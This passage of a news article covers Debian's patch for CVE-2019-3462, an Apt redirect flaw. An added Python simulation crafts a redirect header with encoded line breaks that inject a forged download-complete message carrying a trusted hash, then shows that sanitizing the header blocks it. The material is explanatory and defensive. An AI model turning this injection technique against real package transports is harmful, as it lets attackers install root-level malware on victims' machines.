The Debian Project has patched a security flaw in its software manager Apt that can be exploited by miscreants to execute commands as root on victims' boxes as they update or install packages.
The Linux distro's curators have pushed out a fix to address CVE-2019-3462, a vulnerability uncovered and reported by researcher Max Justicz.
The flaw lies in the way Apt's HTTP transport handles redirects when downloading packages. Apt fetches packages over plain-old HTTP rather than HTTPS, and instead relies on cryptographic signatures on the package index, plus the file hashes listed in that signed index, to check that what it downloaded is legit and hasn't been tampered with.
That design is only as strong as the hash check, and the bug breaks it. A man-in-the-middle (MITM) attacker who can intercept a victim's connection to a mirror can answer a package request with an HTTP redirect whose target URL smuggles in line breaks. Apt's HTTP worker passed that target, unsanitized, into the line-oriented status messages it sends back to the main apt process, the same channel it uses to report a finished download and the hashes of the fetched file. The injected lines therefore let the attacker report whatever hashes they like, including the legitimate values from the signed index, so a malicious package the attacker serves is accepted as sanctioned software. Because package maintainer scripts run as root during installation, that malware can commandeer the machine. Debian's advisory accordingly recommended installing the fix with redirects switched off (apt -o Acquire::http::AllowRedirect=false update, then upgrade the same way) so that the update itself cannot be hijacked by the very bug it patches.
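To make the mechanism concrete, here is an added illustration that is not part of the original article and is not APT's own code: a deliberately simplified Python model of the line-oriented messages APT's HTTP worker sends to the apt frontend. The message and field names ("103 Redirect", "201 URI Done", "SHA256-Hash") follow APT's method interface, but the parsing, the package URI, the file contents and the hashes are all constructed for this example. The vulnerable path pastes a percent-decoded redirect target straight into the message stream; the fixed path refuses a target containing line breaks.

```python
import hashlib
import urllib.parse

# Constructed inputs: a stand-in package URI, a stand-in genuine .deb, and the
# attacker's replacement file.  The signed index "promises" the genuine hash.
PACKAGE_URI = "http://deb.example.org/pool/main/h/hello/hello_2.10-2_amd64.deb"
GENUINE_DEB = b"genuine hello package bytes"
MALICIOUS_DEB = b"attacker-built package bytes"
EXPECTED_SHA256 = hashlib.sha256(GENUINE_DEB).hexdigest()


def worker_redirect_message(requested_uri, location_header, sanitize):
    """HTTP worker turns a Location header into a '103 Redirect' message.

    Vulnerable path (sanitize=False): the header value is percent-decoded and
    pasted into the message unchanged, so an encoded %0A becomes a real line
    break and the attacker's text becomes extra protocol lines.
    Fixed path (sanitize=True): a target containing line breaks is refused.
    """
    new_uri = urllib.parse.unquote(location_header)
    if sanitize and ("\n" in new_uri or "\r" in new_uri):
        raise ValueError("redirect target contains line breaks; refusing")
    return "103 Redirect\nURI: %s\nNew-URI: %s\n\n" % (requested_uri, new_uri)


def frontend_parse(stream):
    """Frontend splits the worker's output on blank lines into messages,
    each a status line followed by 'Field: value' lines."""
    messages = []
    for chunk in stream.split("\n\n"):
        if not chunk.strip():
            continue
        lines = chunk.split("\n")
        msg = {"status": lines[0]}
        for line in lines[1:]:
            key, sep, value = line.partition(": ")
            if sep:
                msg[key] = value
        messages.append(msg)
    return messages


def frontend_verified(messages, uri, expected_sha256):
    """Frontend accepts a download when a '201 URI Done' for that URI reports
    the hash it expects.  The reported hash comes from the worker, which the
    frontend trusts; that trust is what the injection abuses."""
    return any(
        m["status"].startswith("201")
        and m.get("URI") == uri
        and m.get("SHA256-Hash") == expected_sha256
        for m in messages
    )


def mitm_location_header(uri, claimed_sha256):
    """Attacker's Location header: a harmless-looking path, then percent-encoded
    line breaks that terminate the redirect message, then a forged
    '201 URI Done' carrying whatever hash the attacker wants reported."""
    forged = (
        "\n\n201 URI Done\nURI: %s\n"
        "Filename: /var/cache/apt/archives/partial/hello.deb\n"
        "SHA256-Hash: %s\nSize: 123" % (uri, claimed_sha256)
    )
    return "/mirror" + urllib.parse.quote(forged, safe="")


def payload_hash_matches():
    """The attacker's file never actually hashes to the promised value."""
    return hashlib.sha256(MALICIOUS_DEB).hexdigest() == EXPECTED_SHA256


def simulate(sanitize):
    """True if the frontend would treat the attacker's file as verified.
    The attacker simply claims the public, legitimate hash from the index."""
    header = mitm_location_header(PACKAGE_URI, EXPECTED_SHA256)
    try:
        stream = worker_redirect_message(PACKAGE_URI, header, sanitize)
    except ValueError:
        return False
    return frontend_verified(frontend_parse(stream), PACKAGE_URI, EXPECTED_SHA256)


if __name__ == "__main__":
    print("payload really matches index hash:", payload_hash_matches())
    print("accepted with unsanitized redirect:", simulate(sanitize=False))
    print("accepted with sanitized redirect:  ", simulate(sanitize=True))
```

The point the model makes is that the hash comparison itself is sound; what fails is the boundary between two trust domains. Any line-oriented control channel that carries attacker-influenced strings needs those strings filtered or encoded for that channel, exactly as HTTP itself must reject header injection.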
"I found a vulnerability in apt that allows...